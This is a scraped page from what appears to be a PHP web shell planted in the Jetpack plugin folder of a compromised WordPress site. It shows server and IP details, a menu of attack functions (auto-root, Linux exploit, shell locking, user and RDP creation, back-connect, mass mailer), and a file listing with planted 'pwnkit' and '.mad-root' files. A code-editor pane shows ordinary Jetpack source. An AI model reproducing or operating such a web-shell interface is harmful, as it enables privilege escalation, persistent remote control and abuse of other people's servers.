Linux webm014.cluster130.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.130.20.14 | : 216.73.216.10
Cant Read [ /etc/named.conf ]
7.4.33
hsesolc
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
hsesolc /
www /
wp-content /
plugins /
jetpack /
[ HOME SHELL ]
Name
Size
Permission
Action
3rd-party
[ DIR ]
drwxr-xr-x
_inc
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
extensions
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
jetpack_vendor
[ DIR ]
drwxr-xr-x
json-endpoints
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
sal
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
views
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
CHANGELOG.md
422.56
KB
-rw-r--r--
LICENSE.txt
17.98
KB
-rw-r--r--
SECURITY.md
2.33
KB
-rw-r--r--
class-jetpack-connection-statu...
729
B
-rw-r--r--
class-jetpack-gallery-settings...
3.25
KB
-rw-r--r--
class-jetpack-pre-connection-j...
5.77
KB
-rw-r--r--
class-jetpack-recommendations-...
9.08
KB
-rw-r--r--
class-jetpack-stats-dashboard-...
5.23
KB
-rw-r--r--
class-jetpack-wizard-banner.ph...
214
B
-rw-r--r--
class-jetpack-xmlrpc-methods.p...
8.27
KB
-rw-r--r--
class.frame-nonce-preview.php
3.22
KB
-rw-r--r--
class.jetpack-admin.php
19.82
KB
-rw-r--r--
class.jetpack-affiliate.php
141
B
-rw-r--r--
class.jetpack-autoupdate.php
9.64
KB
-rw-r--r--
class.jetpack-bbpress-json-api...
156
B
-rw-r--r--
class.jetpack-cli.php
71.2
KB
-rw-r--r--
class.jetpack-client-server.ph...
2.79
KB
-rw-r--r--
class.jetpack-connection-banne...
19.35
KB
-rw-r--r--
class.jetpack-data.php
211
B
-rw-r--r--
class.jetpack-gutenberg.php
37.92
KB
-rw-r--r--
class.jetpack-heartbeat.php
4.56
KB
-rw-r--r--
class.jetpack-idc.php
351
B
-rw-r--r--
class.jetpack-modules-list-tab...
14.51
KB
-rw-r--r--
class.jetpack-network-sites-li...
5.9
KB
-rw-r--r--
class.jetpack-network.php
21.31
KB
-rw-r--r--
class.jetpack-plan.php
8.93
KB
-rw-r--r--
class.jetpack-post-images.php
29.29
KB
-rw-r--r--
class.jetpack-twitter-cards.ph...
13.06
KB
-rw-r--r--
class.jetpack-user-agent.php
31.01
KB
-rw-r--r--
class.jetpack.php
226.67
KB
-rw-r--r--
class.json-api-endpoints.php
80.07
KB
-rw-r--r--
class.json-api.php
33.39
KB
-rw-r--r--
class.photon.php
48.63
KB
-rw-r--r--
composer.json
3.62
KB
-rw-r--r--
enhanced-open-graph.php
4.45
KB
-rw-r--r--
functions.compat.php
4.66
KB
-rw-r--r--
functions.cookies.php
1.98
KB
-rw-r--r--
functions.global.php
13.91
KB
-rw-r--r--
functions.opengraph.php
17.6
KB
-rw-r--r--
functions.photon.php
10.26
KB
-rw-r--r--
jetpack.php
7.99
KB
-rw-r--r--
json-api-config.php
330
B
-rw-r--r--
json-endpoints.php
6.7
KB
-rw-r--r--
load-jetpack.php
4.03
KB
-rw-r--r--
locales.php
324
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
24.4
KB
-rw-r--r--
require-lib.php
1.3
KB
-rw-r--r--
uninstall.php
1.29
KB
-rw-r--r--
wpml-config.xml
1.26
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : class-jetpack-gallery-settings.php
<?php /** * Adding extra functions for the gallery. * * @package automattic/jetpack */ use Automattic\Jetpack\Assets; /** * Renders extra controls in the Gallery Settings section of the new media UI. */ class Jetpack_Gallery_Settings { /** * The constructor. */ public function __construct() { add_action( 'admin_init', array( $this, 'admin_init' ) ); } /** * Initialize the admin resources. */ public function admin_init() { /** * Filter the available gallery types. * * @module shortcodes, tiled-gallery * * @since 2.5.1 * * @param array $value Array of the default thumbnail grid gallery type. Default array contains one key, ‘default’. */ $this->gallery_types = apply_filters( 'jetpack_gallery_types', array( 'default' => __( 'Thumbnail Grid', 'jetpack' ) ) ); // Enqueue the media UI only if needed. if ( count( $this->gallery_types ) > 1 ) { add_action( 'wp_enqueue_media', array( $this, 'wp_enqueue_media' ) ); add_action( 'print_media_templates', array( $this, 'print_media_templates' ) ); } // Add Slideshow and Galleries functionality to core's media gallery widget. add_filter( 'widget_media_gallery_instance_schema', array( $this, 'core_media_widget_compat' ) ); } /** * Updates the schema of the core gallery widget so we can save the * fields that we add to Gallery Widgets, like `type` and `conditions` * * @param array $schema The current schema for the core gallery widget. * @return array the updated schema */ public function core_media_widget_compat( $schema ) { $schema['type'] = array( 'type' => 'string', 'enum' => array_keys( $this->gallery_types ), 'description' => __( 'Type of gallery.', 'jetpack' ), 'default' => 'default', ); return $schema; } /** * Registers/enqueues the gallery settings admin js. */ public function wp_enqueue_media() { if ( ! wp_script_is( 'jetpack-gallery-settings', 'registered' ) ) { /** * This only happens if we're not in Jetpack, but on WPCOM instead. * This is the correct path for WPCOM. */ wp_register_script( 'jetpack-gallery-settings', Assets::get_file_url_for_environment( '_inc/build/gallery-settings.min.js', '_inc/gallery-settings.js' ), array( 'media-views' ), '20121225', false ); } wp_enqueue_script( 'jetpack-gallery-settings' ); } /** * Outputs a view template which can be used with wp.media.template */ public function print_media_templates() { /** * Filter the default gallery type. * * @module tiled-gallery * * @since 2.5.1 * * @param string $value A string of the gallery type. Default is ‘default’. */ $default_gallery_type = apply_filters( 'jetpack_default_gallery_type', 'default' ); ?> <script type="text/html" id="tmpl-jetpack-gallery-settings"> <label class="setting"> <span><?php esc_html_e( 'Type', 'jetpack' ); ?></span> <select class="type" name="type" data-setting="type"> <?php foreach ( $this->gallery_types as $value => $caption ) : ?> <option value="<?php echo esc_attr( $value ); ?>" <?php selected( $value, $default_gallery_type ); ?>><?php echo esc_html( $caption ); ?></option> <?php endforeach; ?> </select> </label> </script> <?php } } new Jetpack_Gallery_Settings();
Close